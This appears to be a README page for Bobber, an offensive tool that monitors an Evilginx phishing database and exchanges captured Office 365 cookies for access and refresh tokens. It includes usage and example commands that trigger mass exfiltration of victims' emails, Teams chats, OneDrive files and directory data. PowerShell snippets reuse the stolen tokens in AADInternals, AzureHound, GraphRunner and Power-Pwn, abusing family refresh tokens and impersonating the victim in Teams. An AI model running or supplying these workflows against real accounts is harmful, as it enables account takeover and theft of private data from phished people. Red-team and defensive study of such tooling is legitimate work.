Bobber Save
Bounces when a fish bites - Evilginx database monitoring with exfiltration automation
Bobber - Bounces when a fish bites!
▓▓
▓▓▓
▓▓
▓▓▓
▓▓
▓▓▓
▓▓
▓▓▓
▓▓
▓▓▓
░░░░░░░░░░░░░░░░░░█▓▓▓▓▓░░░░░░░░░░░░░
░░░░░░░░ ▓▓▓█▓▓▓▓▓ ░░░░░░░░
░░░░░░ ░░░░░░░░░░░░░▓▓▓▓▓▓█▓█▓▓▓░░░░░░ ░░░░░░
░░░░░░ ░░░░░░ ▓▓█▓▓▓▓▓▓▓▓▓▓ ░░░░░░ ░░░░░
░░░░░ ░░░░░ ░░░░░░░░░░▓▓▓▓█▓▓▓▓█▓▓▓░░ ░░░░░ ░░░░░
░░░░░ ░░░░░ ░░░░░ ▓█▓▓▓▓█▓▓▓▓█▓▓ ░░░░░ ░░░░░ ░░░░░
░░░░░ ░░░░ ░░░░░ ░░░▒▓▓▓▓▓▓▓▓█▓▓▓▓ ░░░░░ ░░░░ ░░░░░
░░░░ ░░░░░ ░░░░ ░░░ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░ ░░░░░ ░░░░
░░░░ ░░░░░ ░░░░░ ░░░░░▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░ ░░░░░ ░░░░
░░░░░ ░░░░░ ░░░░ ░░░░░░ ░░░░░ ░░
░░░░░ ░░░░░ ░░░░░░░░ ░░░░░░░░ ░░░░░ ░░░
Bobber - Bounces when a fish bites!
Bobber monitors a given Evilginx database file for changes, and if a valid Evilginx session complete with a captured Microsoft Office 365 cookie is found, Bobber will utilize the RoadTools RoadTX library to retrieve the access and refresh tokens for the user, then optionally trigger TeamFiltration to exfiltrate all the sweet, sweet loot. Bobber supports monitoring a local file path or a file path on a remote host through SSH.
Bobber accepts a number of input arguments to adjust the RoadTools interactive auth flow, selection between key and credential-based SSH auth, as well as the added benefit of receiving pushover notifications once a user submits their credentials and the loot is on the way.
Checkout the TrustedSec Blogpost The Triforce of Initial Access, for more information
usage: bobber.py [-h] [--host HOST] [--port PORT] [--username USERNAME] [--password PASSWORD] [--key KEY]
[--user-key USER_KEY] [--api-token API_TOKEN] [--all] [--aad] [--teams] [--onedrive] [--owa]
[--owa-limit OWA_LIMIT] [--tf-path TF_PATH] [-c CLIENT] [-r RESOURCE] [-s SCOPE] [-ru URL]
[-t TENANT] [-d DRIVER_PATH] [-k]
database_path
positional arguments:
database_path Path to the local OR remote Evilginx database file.
options:
-h, --help show this help message and exit
SSH Options:
Evilginx database monitoring SSH options
--host HOST SSH hostname/IP when fetching from a remote host.
--port PORT SSH port when fetching from a remote host.
--username USERNAME SSH username when fetching from a remote host.
--password PASSWORD SSH password when fetching from a remote host.
--key KEY Path to the SSH private key file for authentication.
Pushover Options:
Pushover notifications options
--user-key USER_KEY Pushover User Key
--api-token API_TOKEN
Pushover API Token
TeamFiltration Options:
Exfiltration options for TeamFiltration
--all Exfiltrate information from ALL SSO resources (Graph, OWA, SharePoint, OneDrive, Teams)
--aad Exfiltrate information from Graph API (domain users and groups)
--teams Exfiltrate information from Teams API (files, chatlogs, attachments, contactlist)
--onedrive Exfiltrate information from OneDrive/SharePoint API (accessible SharePoint files and the user's entire OneDrive directory)
--owa Exfiltrate information from the Outlook REST API (The last 2k emails, both sent and received)
--owa-limit OWA_LIMIT
Set the max amount of emails to exfiltrate, default is 2k.
--tf-path TF_PATH Path to your TeamFiltration file on disk (download from https://github.com/Flangvik/TeamFiltration/releases/latest)
RoadTools Options:
RoadTools RoadTX interactive authentication options
-c CLIENT, --client CLIENT
Client ID (application ID / GUID ) to use when authenticating (Teams Client by default)
-r RESOURCE, --resource RESOURCE
Resource to authenticate to. Either a full URL or alias (list with roadtx listaliases)
-s SCOPE, --scope SCOPE
Scope to use. Will automatically switch to v2.0 auth endpoint if specified. If unsure use -r instead.
-ru URL, --redirect-url URL
Redirect URL used when authenticating (default: https://login.microsoftonline.com/common/oauth2/nativeclient)
-t TENANT, --tenant TENANT
Tenant ID or domain to auth to
-d DRIVER_PATH, --driver-path DRIVER_PATH
Path to geckodriver file on disk (download from: https://github.com/mozilla/geckodriver/releases/latest)
-k, --keep-open Do not close the browser window after timeout. Useful if you want to browse online apps with the obtained credentials
Setup
-
git clone https://github.com/Flangvik/Bobber -
pip install -r requirements.txt - Download the latest version of TeamFiltration for your platform, and place the binary inside the Bobber folder (Optional)
- Download the latest version of Geckodriver for your platform, and place the binary inside the Bobber folder
-
python3 Bobber.py --helpand get going!
Example Usage
Monitor a remote file for changes via SSH, authenticate using your default ssh key (~/.ssh/id_rsa), keep the browser session open after RoadTools has exchanged captured cookie for JWT tokens, and exfiltrate only AAD Users and Groups data from the Graph API
python bobber.py "/root/.evilginx/data.db" --username root --host 1337.66.69.420 --keep-open --aad
Monitor a local file for changes, exchange captured cookies for JWT token, and exfiltrate only emails.
python bobber.py evilginx_data.db --host 1337.66.69.420 --owa
Monitor a remote file for changes over SSH, authenticate using username and password, exchange captured cookies for JWT tokens, and exfiltrate all data available.
python bobber.py "/root/.evilginx/data.db" --username root --password 'MySuperPass123!' --all
Usage with other tools
When Bobber captures a complete Evilginx session, tokens retrieved using RoadTools will be stored in a file using the following naming convention .sanitized_email_roadtools_auth. This file can be used in combination with many other tools besides TeamFiltration. Here are a few examples from the context of a PowerShell prompt.
AADInternals
AADInternals is an Modular powershell-framework for exploring the pathways your access might have, created by my favorite finnish person @DrAzureAD
#Read and parse the RoadTools auth file into a JSON object
$roadToolsAuth = Get-Content .\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json
#Add the token information from RoadTools to the cache so it will be used for auth
Add-AADIntAccessTokenToCache -AccessToken $roadToolsAuth.accessToken -RefreshToken $roadToolsAuth.refreshToken
#Read Teams messages from the GraphAPI
Get-AADIntTeamsMessages | Format-Table id,content,deletiontime,*type*,DisplayName
# Send a Teams message to an a user using the GraphAPI
Send-AADIntTeamsMessage -Recipients "[email protected]" -Message "Hello there, BATMAN!"
#Abuse [Family Refresh Tokens](https://github.com/secureworks/family-of-client-ids-research#abusing-family-refresh-tokens-for-unauthorized-access-and-persistence-in-azure-active-directory) to refresh as the the "Microsoft Azure PowerShell" Application (1950a258-227b-4e31-a9cf-717495945fc2). Obtains an access token with a different scope.
$msAzJWT =Get-AADIntAccessTokenWithRefreshToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -TenantId $roadToolsAuth.tenantId -RefreshToken $roadToolsAuth.refreshToken -SaveToCache 1 -IncludeRefreshToken 1
AzureHound
AzureHound is a BloodHound data collector for Microsoft Azure, from the great people over at @SpecterOps
#Read and parse RoadTools auth file into a JSON object
$roadToolsAuth = Get-Content .\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json
#Use the refresh token and tenantId to run AzureHound against the tenant
./azurehound.exe -r $roadToolsAuth.refreshToken -t $roadToolsAuth.tenantId list -o output.json
GraphRunner
GraphRunner Powershell-based post-exploitation toolset for interacting with the Microsoft Graph API, by @dafthack
#Import GraphRunner
Import-Module .\GraphRunner.ps1
#Read and parse RoadTools auth file into a JSON object
#While the JSON object of roadtools does not match what GraphRunner needs, enough properties match to "trick" GraphRunner into allowing us to run RefreshGraphTokens
$tokens = Get-Content .\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json
#Run RefreshGraphTokens to update our $tokens var
Invoke-RefreshGraphTokens -RefreshToken $roadToolsAuth.refreshToken -tenantid $roadToolsAuth.tenantId
#Most common command to dump a series of information from the Graph API
Invoke-GraphRunner -Tokens $tokens
Power-Pwn
Power-Pwn in Python-based offensive security toolset for targeting the Microsoft 365 Power Platform, by @mbrg0
#Read and parse RoadTools auth file into a JSON object
$roadToolsAuth = Get-Content .\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json
#Create tokens.json in the same directory you are running powerpwn.exe from
@{cli_refresh_token = $roadToolsAuth.refreshToken } | ConvertTo-Json | Set-Content -Path 'tokens.json'
#Perform recon of possible Power Platform deployments
./powerpwn.exe recon -t $roadToolsAuth.tenantId
#Dump data from found Power Platform deployments
./powerpwn.exe dump -t $roadToolsAuth.tenantId
Todo
- Add an option to specify a proxy URL for token retrieval and exfiltration
- Allow for capture and notification for other username + password + cookie combinations (then only O365)
- Options to get Pushover notifications even if only username + password was captured (no cookie)
Credits
Open Source Agenda Badge
